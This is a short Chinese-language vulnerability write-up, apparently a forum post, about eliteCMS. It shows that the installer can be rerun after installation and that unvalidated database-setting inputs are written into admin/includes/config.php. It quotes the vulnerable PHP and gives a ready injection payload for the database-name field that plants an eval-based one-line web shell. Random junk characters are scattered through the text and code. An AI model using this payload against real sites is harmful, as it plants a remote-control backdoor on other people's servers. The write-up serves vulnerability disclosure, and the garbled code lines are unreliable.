eliteCMS安装文件未验证 + 一句话写入安全漏洞

admin

eliteCMS的安装程序安装结束后未作锁定，导致黑客可以通过访问安装程序地址进行重复安装

0 r& B0 \1 {' G另外一个漏洞是安装程序可以直接写入一句话到admin/includes/config.php
我们来看代码：
: s$ s& T( |. b% I
, f/ I9 a- Z+ N, S: z...
elseif ($_GET['step'] == "4") {
# g/ ?2 d: C, d1 ^    $file = "../admin/includes/config.php";
& s" {7 [  w2 @( Z0 P    $write = "<?php\n";
  t: |1 A1 b$ p% X    $write .= "/**\n";
    $write .= "*\n";
    $write .= "*eliteCMS-The LightweightCMS Copyright 2008 elite-graphix.net.\n";
' m, [' k3 x7 _( D" }! @...略...
    $write .= "*\n";
    $write .= "*/\n";
, C: d5 I- e1 r8 h- @    $write .= "\n";
, T: D5 X' j" j3 i    $write .= "define(\"DB_SERVER\", \"{$_SESSION['DB_SERVER']}\");\n";
; F& U0 @+ `" Q. [4 L; H    $write .= "define(\"DB_NAME\", \"{$_SESSION['DB_NAME']}\");\n";
    $write .= "define(\"DB_USER\", \"{$_SESSION['DB_USER']}\");\n";
    $write .= "define(\"DB_PASS\", \"{$_SESSION['DB_PASS']}\");\n";
    $write .= "\$connection = mysql_connect(DB_SERVER, DB_USER, DB_PASS);\n";
, `. T. K) l* v- v6 j4 V% c    $write .= "if (!\$connection) {\n";
! T- @2 d' A' p! k0 P    $write .= "        die(\"Database connection failed\" .mysql_error());\n";
    $write .= "        \n";
    $write .= "} \n";
+ f/ F- b; J3 y9 E3 J    $write .= "\$db_select = mysql_select_db(DB_NAME, \$connection);\n";
    $write .= "if (!\$db_select) {\n";
    $write .= "        die(\"Database select failed\" .mysql_error());\n";
& E) R2 ]. ]7 M, |    $write .= "        \n";
    $write .= "} \n";
    $write .= "?>\n";

    $writer = fopen($file, 'w');
...
2 h" V* p  L( y: l" H* R
在看代码：

  n# G0 M  W/ l- ]" H! ?0 w$_SESSION['DB_SERVER'] = $_POST['DB_SERVER'];
$_SESSION['DB_NAME'] = $_POST['DB_NAME'];
* S' X8 F- K9 E$ F% l9 s0 |9 F, V$_SESSION['DB_USER'] = $_POST['DB_USER'];
+ k- D4 B4 R! R0 Z" x5 B8 ?$ h2 ~$_SESSION['DB_PASS'] = $_POST['DB_PASS'];
( e2 Z+ H7 E7 C) g
: i, k3 H# x+ h8 A取值未作任何验证
如果将数据库名POST数据：

"?><?php eval($_POST[c]);?><?php
& Q+ r5 r3 g/ g% l. B
& F1 s: K' Y1 D! T9 L6 r将导致一句话后门写入/admin/includes/config.php